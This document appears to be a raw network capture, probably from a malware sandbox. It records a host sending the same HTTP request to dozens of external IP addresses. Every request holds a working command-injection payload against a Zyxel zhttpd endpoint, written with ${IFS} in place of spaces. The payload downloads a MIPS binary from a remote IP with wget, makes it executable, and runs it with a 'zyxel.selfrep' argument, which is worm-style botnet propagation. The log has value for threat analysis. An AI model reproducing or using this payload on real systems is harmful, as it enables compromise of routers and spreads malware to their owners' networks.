                                                Jan 28, 2024 10:16:18.703320980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2717192.168.2.2352384105.222.51.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703336000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2718192.168.2.235742889.123.17.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703366041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2719192.168.2.2351754205.17.42.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703391075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2720192.168.2.2357238170.91.225.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703413963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2721192.168.2.2360380145.62.117.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703464031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2722192.168.2.2345968158.167.173.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703469992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2723192.168.2.2339092208.113.67.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703505039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2724192.168.2.2357740222.84.68.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703527927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2725192.168.2.234149632.237.41.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703547955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2726192.168.2.2335552103.196.46.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703572989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2727192.168.2.23468289.72.30.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703588963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2728192.168.2.2356544136.83.228.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703622103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2729192.168.2.2342424188.224.39.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703665972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2730192.168.2.233980070.113.30.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703684092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2731192.168.2.235783444.112.56.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703705072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2732192.168.2.235851894.99.245.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703738928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2733192.168.2.2337694166.235.232.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703768015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2734192.168.2.2335334223.20.127.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703809023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2735192.168.2.234747096.70.191.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703828096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2736192.168.2.234876820.94.2.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703836918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2737192.168.2.2334598185.114.98.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703876972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2738192.168.2.2347090213.146.113.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703918934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2739192.168.2.2360182143.17.10.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703933954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2740192.168.2.2335222143.92.198.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703963995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2741192.168.2.235808012.9.151.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704005957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2742192.168.2.2341908159.186.253.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704022884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2743192.168.2.234690877.13.157.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704047918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2744192.168.2.2359874140.94.132.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704066038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2745192.168.2.2359722167.117.62.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704090118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2746192.168.2.2352282189.165.122.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704130888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2747192.168.2.2358764211.129.96.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704149961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2748192.168.2.2341732195.167.41.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704186916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2749192.168.2.235705219.227.67.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704219103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2750192.168.2.2349246211.130.249.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704235077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2751192.168.2.2352072123.45.96.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704265118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2752192.168.2.235221661.170.89.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704289913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2753192.168.2.2343256220.127.248.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704346895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2754192.168.2.234204012.237.239.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704370022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2755192.168.2.235980696.154.51.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704407930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2756192.168.2.235020046.145.195.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704425097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2757192.168.2.2334398142.244.229.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704458952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2758192.168.2.2339572114.173.105.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704495907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2759192.168.2.234456672.18.174.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704555988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2760192.168.2.2335920165.177.217.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704571962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2761192.168.2.2340832122.102.30.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704611063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2762192.168.2.235775248.238.60.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704636097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2763192.168.2.2337994133.203.150.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704663992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2764192.168.2.235579497.96.123.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704694986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2765192.168.2.23605545.237.239.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704709053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2766192.168.2.235251079.171.166.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704724073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2767192.168.2.2355974113.185.85.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704797983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2768192.168.2.235621250.37.42.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704799891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2769192.168.2.2348964186.167.90.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704802990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2770192.168.2.235830288.33.138.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704838037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2771192.168.2.234667665.131.63.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704869986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2772192.168.2.23335165.11.153.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704878092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2773192.168.2.234808097.7.252.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704900980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2774192.168.2.2353662134.35.196.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704955101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2775192.168.2.2352790175.25.88.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704960108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2776192.168.2.234047442.205.15.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.704991102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2777192.168.2.2344890180.207.120.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.705049992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2778192.168.2.234842672.192.106.209443
                                                TimestampBytes transferredDirectionData
